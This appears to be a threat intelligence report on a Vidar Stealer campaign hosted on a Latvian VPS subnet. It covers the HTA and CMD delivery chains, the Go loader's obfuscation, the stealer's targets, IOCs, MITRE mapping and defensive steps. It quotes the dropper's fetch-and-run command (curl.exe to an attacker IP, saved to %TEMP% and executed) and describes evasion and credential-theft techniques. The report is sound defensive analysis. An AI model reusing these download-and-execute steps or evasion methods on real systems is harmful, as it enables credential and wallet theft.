highPhishing

Open Directory, Open Season: Vidar Stealer Campaign Exposed on Latvian Bulletproof Infrastructure

PublishedMarch 12, 2026

Threat Actors:ProfileAssessmentTimeline

phishingvidarasyncratc2spearphishing

TL;DR: A multi-stage Vidar Stealer campaign was identified operating from a fully exposed open directory on Podaon SIA (AS211381) VPS infrastructure in Germany. The operator left WebDAV write access enabled on the delivery server, exposing the entire payload set and upload methodology. Two parallel delivery chains were found: an HTA/VBScript dropper that downloads a Go-based loader (disguised as favicon.ico), and a CMD batch file that executes the Vidar stealer binary (disguised as digest.bin). The stealer masquerades as 7-Zip File Manager and targets browser credentials, cryptocurrency wallets, Telegram data, and system information. The Go loader (compiled with Go 1.25.0) uses heavily obfuscated function names mimicking Kubernetes and blockchain applications, with the revealing source path convicted/main.go. The same /24 subnet hosts AsyncRAT C2 infrastructure on a neighboring IP, indicating multi-campaign use of this hosting provider. As of March 10, 2026, all delivery infrastructure remains fully operational.

Key Findings

An Open Directory Full of Malware

The delivery server at 188.137.224[.]103 is running Apache 2.4.52 on Ubuntu with directory listing enabled and WebDAV methods active. Anyone browsing to the server's root can see the complete campaign payload set:

File	Last Modified	Size	Purpose
digest.bin	2026-03-07 16:55	1.1 MB	Vidar Stealer (masquerades as 7-Zip)
favicon.ico	2026-03-09 15:14	2.1 MB	Go-based loader/dropper
fix.cmd	2026-03-07 16:55	371 B	CMD batch dropper
verif.hta	2026-03-09 15:14	646 B	HTA/VBScript downloader

WebDAV methods are fully enabled: PUT, DELETE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE. This means the operator uploads fresh payloads remotely via WebDAV without needing SSH or RDP access to the Linux delivery server. The RDP-accessible Windows box at .92 in the same subnet is likely the operator's campaign management workstation.

Two Parallel Delivery Chains

The campaign uses two independent dropper mechanisms, likely for A/B testing or to target different victim scenarios:

Chain 1: HTA/VBScript (verif.hta)

Downloads favicon.ico (Go loader) via curl.exe -s -o
Saves to %TEMP%\svc22121d.exe
Executes via Shell.Application.ShellExecute
Self-closes to remove HTA window
3-second delay via ping -n 3 127.0.0.1

Chain 2: CMD Batch (fix.cmd)

Copies digest.bin (Vidar stealer) to randomized temp path
Format: %TEMP%\u<random>\sv<random>t.exe
Falls back to xcopy if copy fails
Cleans up staged binary and temp directory after execution
2-4 second delays between stages

Go Loader: Kubernetes-Flavored Obfuscation

The Go-based loader (favicon.ico / cache.bin) is compiled with Go 1.25.0 and uses a distinctive two-layer obfuscation scheme:

Layer 1 -- Function Names: Gibberish English compound words designed to look like legitimate application code:

Congratulationsdisorders
Containerspediatric
Deliciousexpenditure
Differencesinstructional
Verificationefficiency

Layer 2 -- Type Names: Fake Kubernetes and blockchain type definitions:

Deployment, Pod, PodPhase, RestartPolicy, ResourceQuota, ScheduleResult
Wallet, Transaction, NodeID

This dual obfuscation is designed to make the binary appear as a legitimate container orchestration or blockchain application during casual analysis. However, the source path convicted/main.go and the preserved Go build ID (RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS) undermine this effort.

Multi-Campaign Infrastructure

The entire 188.137.224.0/24 subnet appears to be used for malicious purposes:

IP	Ports	Purpose
.103	80	Vidar delivery server (open directory)
.92	3389	Operator RDP workstation
.125	6000	AsyncRAT C2 server
.94	443	bestandzest[.]lol (suspicious domain)
.108	22, 80, 443	arrocagipplus[.]com (suspicious domain)
.96	3389	Windows RDP
.98	3389, 5986	Windows RDP + WinRM
.105	3389, 5986	Windows RDP + WinRM
.110	3389, 5357, 5986	Windows RDP + WinRM + WSDAPI

The AsyncRAT C2 at .125 on port 6000 is particularly notable -- it confirms this hosting provider is being used for multiple simultaneous cybercrime campaigns, likely by the same operator or a shared infrastructure arrangement.

Attack Chain

Phase 1: Initial Access
  Victim receives link to delivery server
  (Exact delivery mechanism -- email, SEO poisoning, or malvertising -- TBD)
      |
      v
Phase 2A: HTA Delivery Path
  Browser opens verif.hta
  VBScript executes: curl.exe -s -o %TEMP%\svc22121d.exe
    hxxp://188.137.224[.]103/favicon.ico
  3-second delay (ping -n 3 127.0.0.1)
  ShellExecute launches svc22121d.exe
  HTA self-closes (Self.Close)
      |
      v
Phase 2B: CMD Delivery Path (alternate)
  fix.cmd batch script executes
  Creates randomized temp directory: %TEMP%\u<random>\
  Copies digest.bin to sv<random>t.exe (xcopy fallback)
  2-4 second delays between stages
  Executes renamed binary
  Cleans up: del /q + rmdir /q
      |
      v
Phase 3A: Go Loader Execution (from HTA path)
  Go 1.25.0 binary with obfuscated symbols
  XOR-decrypts embedded C2 URL
  Suspected dead-drop resolver (Steam/Telegram profile)
  Downloads and executes Vidar stealer
      |
      v
Phase 3B: Direct Stealer Execution (from CMD path)
  Vidar stealer runs directly
  Masquerades as 7-Zip File Manager v23.03
      |
      v
Phase 4: Data Collection
  Browser credentials (Chrome, Firefox, Opera, Brave, Edge)
  Cryptocurrency wallets (ETH, BTC, others)
  Telegram session data (tdata directory)
  System information (Computer, User, OS, CPU, RAM, PID)
  DPAPI secret extraction
  Files from Desktop, Documents, Downloads
      |
      v
Phase 5: Exfiltration
  Data staged and compressed
  HTTP POST to C2 server
  Session terminated

Infrastructure Analysis

Hosting Provider: Podaon SIA

The hosting provider is Podaon SIA, a Latvian company operating under the brand vps.ac:

Organization:  Podaon SIA
Address:       Ernesta Birznieka-Upisa 18, Riga, LV-1050, Latvia
ASN:           AS211381
Maintainer:    lir-lv-podaon-1-MNT
Created:       2022-11-29
Abuse Contact: abuse@podaon.com

Podaon announces 89 /24 prefixes via AS211381 -- a substantial allocation for a company that appears to be a low-profile VPS provider. The upstream transit providers include Serverius (AS50673), Speed-IX (AS41441), NovoEU (AS24875), NovoUS (AS939), and CloudK (AS200187).

The combination of factors -- large IP allocation, multiple transit providers, presence of multiple malware campaigns on the same /24, and lack of visible abuse response -- strongly suggests Podaon SIA operates as a bulletproof hosting provider or at minimum exercises negligible abuse enforcement.

Network Topology

Upstream Transit:
  Serverius (AS50673) ----+
  Speed-IX (AS41441) -----+
  NovoEU (AS24875) -------+--> AS211381 (Podaon SIA)
  NovoUS (AS939) ---------+        |
  CloudK (AS200187) ------+        +--> 89 x /24 prefixes
                                    |
                              188.137.224.0/24
                                    |
            +-------+-------+------+------+------+
            |       |       |      |      |      |
          .92     .94     .96    .98    .103   .105
         (RDP)  (domain) (RDP) (RDP)  (HTTP) (RDP)
                          .108   .110   .125
                        (domain)(RDP) (AsyncRAT)

Adjacent Domains

Two suspicious domains were discovered on neighboring IPs:

Domain	IP	Registrar	Created	Status
bestandzest[.]lol	188.137.224[.]94	Joker (CSL GmbH)	2026-02-15	DEAD (SERVFAIL)
arrocagipplus[.]com	188.137.224[.]108	Namecheap	2026-02-04	LIVE (Cloudflare proxied)

Both domains were registered within weeks of the Vidar campaign setup (February 2026) and are hosted on the same /24 subnet, suggesting they are either part of the same operation or operated by a co-tenant on the infrastructure.

Open Directory as Intelligence Source

The open directory is an unusual intelligence gift. The file timestamps reveal the operator's workflow:

March 7, 16:55 -- Initial campaign setup: digest.bin (Vidar stealer) and fix.cmd (CMD dropper) uploaded
March 9, 15:14 -- Second wave: favicon.ico (Go loader) and verif.hta (HTA dropper) uploaded, adding the Go loader delivery path

The two-day gap between uploads suggests the operator tested the CMD/direct delivery path first, then added the HTA/Go loader path as a second channel -- possibly after encountering detection or delivery issues with the simpler approach.

Malware Technical Analysis

Vidar Stealer (digest.bin)

Property	Value
SHA-256	`76005b67d11c0e89c76655b2ddc16f5bb778ee547f2a4c6fc2e2e1d7e2dde7d9`
File Type	PE32+ executable (x64)
Size	1,196,544 bytes
Compiler	GCC 14.1.0 (Mingw-w64)
Compilation	2026-02-20
Imphash	`2f611bc63293ca885a70090be8df0f3b`
Sections	10 (.text, .data, .rdata, .pdata, .xdata, .bss, .idata, .tls, .rsrc, .reloc)
Imports	KERNEL32.dll, msvcrt.dll only

Masquerade Identity: The VERSION resource claims to be "7-Zip File Manager" v23.03 by Igor Pavlov. This masquerading serves two purposes: it provides a plausible process name in Task Manager, and it may bypass application whitelisting rules that allow 7-Zip.

Minimal Import Table: Only KERNEL32.dll and msvcrt.dll are statically imported. All other Windows API calls are resolved dynamically at runtime, significantly complicating static analysis. This is a hallmark of modern information stealers designed to evade import-based detection heuristics.

Data Collection Capabilities (extracted from .rdata format strings):

Browser credentials: Browsers/%s/%s/%s, cookies.sqlite, places.sqlite, Web Data -- targets Chrome, Firefox, Opera, Brave, Edge
Cryptocurrency wallets: Wallets/%s, Ethereum.docx -- harvests wallet files and seed phrases
Telegram data: Telegram/tdata -- steals session files for account hijacking
System fingerprinting: Collects Computer name, User name, OS version, CPU core count, RAM size, PID
DPAPI secrets: Extracts Windows Data Protection API-protected credentials
File collection: Harvests files from Desktop, Documents, and Downloads directories

Anti-Analysis: A 1.1MB block of word salad text is embedded in the RCDATA resource section. The text begins with "come management color face extension parser once order side they analyzer mark" and continues with randomized English words. This serves as file size inflation to evade sandbox analysis (many sandboxes have file size limits or reduce analysis time for larger files) and dilutes entropy calculations.

Go Loader (favicon.ico / cache.bin)

Property	Value
SHA-256	`1c83863bda00873d081eb525fff37080a4b262a9092ca00887ba56234b860273`
File Type	PE32+ executable (x64, Go)
Size	2,165,248 bytes
Go Version	go1.25.0
Source Path	convicted/main.go
Build ID	RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS
Imphash	`d42595b695fc008ef2c56aabd8efd68e`
PE Timestamp	Epoch 0 (zeroed)

31 Exported Symbols were extracted from the preserved .symtab section:

Core functions:

main.main -- Entry point
main.init -- Initialization
main.Changelog (with nested closures .func1, .func1.1, .func1.2) -- Likely core C2/loader logic

Obfuscated functions:

main.Congratulationsdisorders
main.Containerspediatric
main.Deliciousexpenditure
main.Differencesinstructional
main.Verificationefficiency
(and 20+ additional compound-word names)

C2 Resolution: MalwareBazaar YARA matches confirm XOR-encrypted URLs (SUSP_XORed_URL_In_EXE). The encryption uses multi-byte or complex XOR (possibly RC4), preventing simple static extraction. The dead-drop resolver pattern -- where the actual C2 URL is retrieved from a legitimate service like a Steam profile or Telegram channel -- is suspected but unconfirmed without dynamic analysis.

Anti-Debug: YARA matches for five anti-debugging techniques:

DebuggerCheck__API -- Uses IsDebuggerPresent or CheckRemoteDebuggerPresent
DebuggerCheck__QueryInfo -- Queries NtQueryInformationProcess
DebuggerCheck__RemoteAPI -- Checks for remote debugger attachment
DebuggerException__SetConsoleCtrl -- Exception-based debugger detection
DebuggerHiding__Active -- Active debugger evasion

HTA Dropper (verif.hta)

The 646-byte HTA file is minimal but effective:

Delivery URL:  hxxp://188.137.224[.]103/favicon.ico
Download tool: curl.exe (native to Windows 10+)
Arguments:     -s (silent) -o (output to file)
Drop path:     %TEMP%\svc22121d.exe
Execution:     Shell.Application.ShellExecute
Evasion:       Self.Close (removes HTA window)
Delay:         ping -n 3 127.0.0.1 (3-second pause)

The use of curl.exe rather than certutil, bitsadmin, or powershell for the download is notable -- it generates less suspicious telemetry in most EDR solutions, as curl is increasingly used for legitimate purposes on Windows.

CMD Dropper (fix.cmd)

The 371-byte batch file implements several anti-forensics techniques:

Staging:       Creates unique temp directory (%TEMP%\u<random>\)
Copy method:   copy command with xcopy fallback
Filename:      sv<random>t.exe (randomized)
Cleanup:       del /q (silent delete of executable)
               rmdir /q (remove temp directory)
Delays:        ping -n 2/4 127.0.0.1 (2-4 second pauses)

The randomized directory and filename prevent simple hash-based detection of the staging path. The cleanup step removes the binary after execution, leaving minimal forensic artifacts (though the original digest.bin remains on the delivery server).

Detection

YARA Detection Summary

Four detection rules were developed:

Vidar_Stealer_Digest_Loader_March2026: Targets the main stealer binary via 7-Zip masquerade strings, browser credential format strings (Browsers/%s/%s/%s), cryptocurrency wallet patterns (Wallets/%s), Telegram path references, and imphash.
Vidar_Go_Loader_March2026: Targets the Go loader via build ID, source path convicted/main.go, obfuscated function name patterns, Kubernetes/blockchain type name artifacts, and Go 1.25.0 version string.
Vidar_HTA_Dropper_March2026: Targets the HTA dropper via the curl download command pattern, drop path svc22121d.exe, delivery URL, and VBScript execution indicators.
Vidar_CMD_Dropper_March2026: Targets the CMD batch dropper via the staging path pattern, xcopy fallback logic, cleanup commands, and ping delay technique.

Suricata Detection Summary

Ten network detection rules covering:

HTTP GET requests for specific payload filenames (favicon.ico via curl, digest.bin, verif.hta, fix.cmd)
Connections to 188.137.224.0/24 on port 80
Vidar exfiltration patterns (system fingerprint strings, credential data in POST bodies)
WebDAV method detection (PUT/PROPFIND to delivery server -- indicates operator activity)
DNS queries for bestandzest[.]lol and arrocagipplus[.]com
AsyncRAT beacon patterns to .125:6000

IOCs (Defanged)

Network Indicators

188.137.224[.]103       # Primary delivery server (LIVE, open directory)
188.137.224[.]92        # Alternate delivery / Operator RDP (LIVE)
188.137.224[.]125       # AsyncRAT C2 - adjacent campaign (LIVE)
bestandzest[.]lol       # Suspicious adjacent domain (DEAD)
arrocagipplus[.]com     # Suspicious adjacent domain (LIVE)

Payload URLs

hxxp://188.137.224[.]103/favicon.ico     # Go loader
hxxp://188.137.224[.]103/digest.bin      # Vidar stealer
hxxp://188.137.224[.]103/verif.hta       # HTA dropper
hxxp://188.137.224[.]103/fix.cmd         # CMD dropper

File Hashes

Vidar Stealer (digest.bin):

SHA-256: 76005b67d11c0e89c76655b2ddc16f5bb778ee547f2a4c6fc2e2e1d7e2dde7d9
SHA-1:   10940bd935ccccef2d9c4aaae9bbb6f04ddcd0e0
MD5:     460f47938c04a6fdb9d2faeaf0b16c44
Imphash: 2f611bc63293ca885a70090be8df0f3b
SSDEEP:  12288:4e9TDZ1hSZ+gjWurE6q5u6Z8Axy9uyfjr2hzZzDNXv:nhSn/r1jg7

Go Loader (favicon.ico / cache.bin):

SHA-256: 1c83863bda00873d081eb525fff37080a4b262a9092ca00887ba56234b860273
SHA-1:   1752e656e0c810d2714c514770667f89d30d6d2e
MD5:     730d705a72665f08fb2d8dddfc7e6443
Imphash: d42595b695fc008ef2c56aabd8efd68e
SSDEEP:  49152:zR2JFtXzphcQKV+cIPQu15jCSrvzdzAj:zEd7WVUoEdr7

CMD Dropper (fix.cmd):

SHA-256: 98646e45842852d3e8e452f7281393c328655f91cec2cf542c41e981e343c2f9
MD5:     4940141a26a116fb7cd9691afa71ec3e

HTA Dropper (verif.hta):

SHA-256: a3e5d5f04adb29c7cfb294aa5aebe231920456e3c26691dc04eb23ffb9317ed8
MD5:     472e65165aa5490496d6ce1ec0ea67ff

Behavioral Indicators

Go Build ID:     RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS
Go Source Path:  convicted/main.go
Drop Paths:      %TEMP%\u<random>\sv<random>t.exe
                 %TEMP%\svc22121d.exe
VERSION Rsrc:    Company="Igor Pavlov", Product="7-Zip", File="7zFM.exe", Version="23.03"
Word Salad:      "come management color face extension parser once order side they analyzer mark"

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Phishing: Spearphishing Link	T1566.002	Victim directed to delivery server
Execution	User Execution: Malicious File	T1204.002	Victim opens HTA or runs CMD
Execution	Command and Scripting: VBScript	T1059.005	verif.hta VBScript downloader
Execution	Command and Scripting: Windows CMD	T1059.003	fix.cmd batch dropper
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	Vidar poses as 7-Zip File Manager
Defense Evasion	Obfuscated Files: Binary Padding	T1027.001	1.1MB word salad in RCDATA resource
Defense Evasion	Obfuscated Files: Software Packing	T1027.002	XOR-encrypted URLs in Go binary
Defense Evasion	Indicator Removal: File Deletion	T1070.004	CMD dropper deletes staged executable
Credential Access	Credentials from Browsers	T1555.003	Chrome/Firefox/Opera/Brave/Edge harvesting
Credential Access	Steal Web Session Cookie	T1539	cookies.sqlite, Web Data extraction
Credential Access	Unsecured Credentials: Files	T1552.001	Telegram tdata, DPAPI secrets
Collection	Data from Local System	T1005	Desktop/Documents/Downloads file theft
Collection	Data Staged	T1074	Aggregated before exfiltration
Discovery	System Information Discovery	T1082	Computer/User/OS/CPU/RAM enumeration
Command and Control	Application Layer Protocol: HTTP	T1071.001	HTTP-based C2 communication
Command and Control	Web Service: Dead Drop Resolver	T1102	Suspected Steam/Telegram C2 resolution
Exfiltration	Exfiltration Over C2 Channel	T1041	HTTP POST data exfiltration
Impact	Financial Theft	T1657	Cryptocurrency wallet theft

Actor Timeline

Date	Event	Evidence
2026-02-04	arrocagipplus[.]com registered	WHOIS
2026-02-15	bestandzest[.]lol registered	WHOIS
2026-02-20	Vidar stealer binary compiled	PE timestamp
2026-03-07	digest.bin + fix.cmd uploaded to delivery server	Open directory timestamps
2026-03-09	favicon.ico + verif.hta uploaded (Go loader chain added)	Open directory timestamps
2026-03-09	Go loader first submitted to MalwareBazaar	MalwareBazaar first_seen
2026-03-10	Vidar stealer submitted to MalwareBazaar	MalwareBazaar first_seen
2026-03-10	ThreatFox IOC submission for delivery server	ThreatFox first_seen
2026-03-10	Investigation initiated	This report

The 18-day gap between compilation (February 20) and deployment (March 7) suggests the operator either tested the binary in a controlled environment before deployment, or staged the payload while preparing the infrastructure.

Attribution Assessment

Confidence: LOW

No strong attribution indicators were recovered. The infrastructure is hosted in Germany on a Latvian provider, with no language artifacts in the malware or infrastructure. The source path convicted/main.go is intriguing but insufficient for attribution -- it could be a project codename, a reference to the purpose of the tool, or simply arbitrary.

The operator demonstrates intermediate sophistication -- the Go loader obfuscation and dual delivery chains show planning, but the open directory, exposed WebDAV, preserved Go symbols, unstripped binary, plaintext HTTP delivery, and concentration of all infrastructure in a single /24 represent fundamental OPSEC failures that would not be expected from an advanced threat actor.

OPSEC Failures Summary

Open directory listing -- Complete payload inventory visible to the public
WebDAV write access -- Upload methodology exposed to any scanner
Single /24 for all infrastructure -- Delivery, RDP, and alternate servers share the same subnet
Preserved Go source path -- convicted/main.go reveals project naming
Preserved Go build ID -- Enables binary fingerprinting across samples
Preserved .symtab section -- Full function names extractable
Plaintext HTTP delivery -- No TLS on delivery server
Exposed RDP -- Operator workstation at .92:3389 with self-signed cert

Defensive Recommendations

Immediate Priority

Block 188.137.224.0/24 at the perimeter firewall -- the entire subnet is compromised
Search proxy and DNS logs for any historical connections to 188.137.224[.]103 or .92
Deploy all four YARA rules to endpoint detection platforms
Deploy Suricata rules to network IDS/IPS
Search for %TEMP%\svc22121d.exe or %TEMP%\u*\sv*t.exe on all endpoints
Search for file hashes across the endpoint fleet

If Compromise Is Detected

Assume all browser-stored credentials are compromised -- force password resets
Check cryptocurrency wallets for unauthorized transactions
Invalidate Telegram sessions (Settings > Devices > Terminate all other sessions)
Review DPAPI-protected secrets for exposure
Audit files in Desktop, Documents, and Downloads for sensitive data that may have been exfiltrated

Long-Term

Consider blocking AS211381 entirely given documented multi-campaign abuse
Implement detection for HTA files using curl.exe for downloads (uncommon legitimate pattern)
Monitor MalwareBazaar for new Vidar samples with matching imphash or Go build ID
Submit abuse report to Podaon SIA (abuse@podaon.com) and upstream transit providers

Published by Breakglass Intelligence -- Automated threat intelligence. Zero analyst fatigue.

Investigation conducted March 10, 2026. Infrastructure status reflects point-in-time observations.